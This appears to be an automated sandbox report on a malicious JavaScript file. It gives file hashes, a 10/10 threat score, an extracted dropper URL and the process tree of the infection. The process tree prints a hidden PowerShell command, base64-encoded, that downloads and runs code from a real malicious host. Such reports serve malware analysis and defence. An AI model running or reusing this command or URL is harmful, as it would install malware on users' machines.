Overview

overview

10

Static

static

1

1c9d3b9d64...886.js

windows7-x64

10

1c9d3b9d64...886.js

windows10-2004-x64

10

Analysis

  • max time kernel
    0s
  • max time network
    100s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/12/2023, 21:13

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    1c9d3b9d64acff774055d06887681886.js

  • Size

    453KB

  • MD5

    1c9d3b9d64acff774055d06887681886

  • SHA1

    94b3738b90d3ecb6c84c33e2b093854aa831d74a

  • SHA256

    4ce07b8b02edff4408935b2d17158a2e8a65937eaf300f66cd7d8ba93701209d

  • SHA512

    4325dd444e9c84e86c6e7fa8fe2134d091feee28ae01da7d886967b48ac55502147df22378fcdb5e97a97936b4560858cc7de35e91c06523e4f7629e7a23883d

  • SSDEEP

    12288:2kpu3BdD+cHjQnKBam64qzVnvAICJOlowollpE7EixMmlVR:DWIJjofpE7EOzVR

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://grupotopbem.com.br/ashkere.php

Signatures

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\1c9d3b9d64acff774055d06887681886.js
    1⤵
      PID:3664
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AZwByAHUAcABvAHQAbwBwAGIAZQBtAC4AYwBvAG0ALgBiAHIALwBhAHMAaABrAGUAcgBlAC4AcABoAHAAIgApAA==
        2⤵
          PID:3552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AZwByAHUAcABvAHQAbwBwAGIAZQBtAC4AYwBvAG0ALgBiAHIALwBhAHMAaABrAGUAcgBlAC4AcABoAHAAIgApAA==
        1⤵
          PID:3748

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/3748-12-0x000001D621A00000-0x000001D621A10000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3748-13-0x000001D621A00000-0x000001D621A10000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3748-11-0x00007FF9227A0000-0x00007FF923261000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3748-6-0x000001D621930000-0x000001D621952000-memory.dmp

                Filesize

                136KB

                Download

              • memory/3748-17-0x00007FF9227A0000-0x00007FF923261000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3748-14-0x000001D621A00000-0x000001D621A10000-memory.dmp

                Filesize

                64KB

                Download